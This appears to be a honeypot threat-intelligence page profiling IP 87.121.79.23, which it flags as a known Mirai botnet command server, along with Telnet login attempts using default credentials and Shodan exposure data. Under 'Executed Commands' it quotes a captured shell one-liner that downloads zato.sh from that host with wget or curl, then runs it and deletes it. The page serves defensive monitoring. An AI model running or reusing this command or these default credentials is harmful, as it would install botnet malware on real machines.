TROYANOSYVIRUS
Active ThreatLOW

87.121.79.23

Country of Origin🇬🇧 United Kingdom
First Detection3/28/2026
Last Activity4/6/2026
ISP03AI LTD
🎯
29
Total Attacks
🔌
1
Ports
📡
1
Attack Types
🦠
2
Malware

Geolocation

Country
🇬🇧 United Kingdom
City
Unknown
ASN
AS213725
ISP
03AI LTD

Attack Types

ssh_telnet_honeypot

Attacked Ports

23

Associated Malware

Attempted Credentials

🔐root/(empty)
2x
🔐root/admin
2x
🔐root/root
1x
🔐root/123456
1x

Executed Commands

$cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://87.121.79.23/zato.sh -O z || curl -fs http://87.121.79.23/zato.sh -o z; chmod +x z; ./z; rm -f z2x

ThreatFox Intelabuse.ch

⚠️KNOWN C2 SERVER
Malware Families
elf.mirai
Threat Types
botnet_cc
Confidence: 100%

Shodan InternetDB ExposureShodan

InternetDB data, not real-time

Ports
21135445
Vulnerabilities
CVE-2020-0796

Risk Assessment

35
/100
LowMediumHighCritical